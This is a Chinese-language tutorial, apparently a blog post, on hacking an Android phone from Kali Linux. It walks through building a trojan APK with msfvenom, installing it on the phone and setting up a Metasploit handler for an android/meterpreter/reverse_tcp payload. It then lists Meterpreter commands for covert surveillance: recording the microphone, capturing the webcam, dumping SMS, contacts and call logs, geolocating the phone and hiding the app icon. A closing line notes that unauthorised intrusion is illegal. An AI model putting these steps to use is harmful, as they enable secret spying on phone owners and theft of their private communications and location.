安卓手机随处可见,手机的私密性,安全性成为关键,本文将在理想环境下,介绍如何利用kali入侵一部安卓手机。
废话不说,教程开始!
1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)。
代码注释:
*LHOST:本机IP
*LPORT:这的5555是随意的端口,可以自己更改
*/root/apk.apk(追加到指定的路径生成apk.apk文件)
2.将木马安装到手机上(我直接用自己手机测试学习)
3.启动msf,msfconsole输入命令
1.msf> use exploit/multi/handler //加载模块
2.msf> set payload android/meterpreter/reverse_tcp //选择Payload
#修改Ip和端口
3.msf> set LHOST 192.168.43.18 //Ip设置为本机ip
4.msf> set LPORT 5555 //端口设置为配置的本地端口
5.msf> exploit //开始监听,等待木马响应
红色框出的地方就说明手机上线了 然后可以输入sysinfo 查看手机信息了。
4.接下来是一些常用命令
Stdapi: Webcam Commands
===================================
webcam_list 列出网络摄像头
record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒
webcam_chat 开始视频聊天
webcam_snap 从指定的摄像头获取快照
webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]
Android Commands
=================
activity_start 从URI字符串启动Android活动
check_root 检查设备是否有根
dump_calllog 获取调用日志
dump_contacts 获取联系人列表
dump_sms 获取短信
geolocate 利用地理定位获取当前LAT
wlan_geolocate 利用WLAN信息获取当前LAT
hide_app_icon 从发射器隐藏应用程序图标
interval_collect 管理区间收集能力
send_sms 从目标会话发送短消息
set_audio_mode
sqlite_query 从存储库查询SQLite数据库
wakelock 启用/禁用Wakelock
好了,教程到此结束了,教程只是引导,真的技术还需要自己去亲自实践。
(注意:凡未经他人同意,非法侵入,窃取他人信息的网络行为,都是违法犯罪行为)
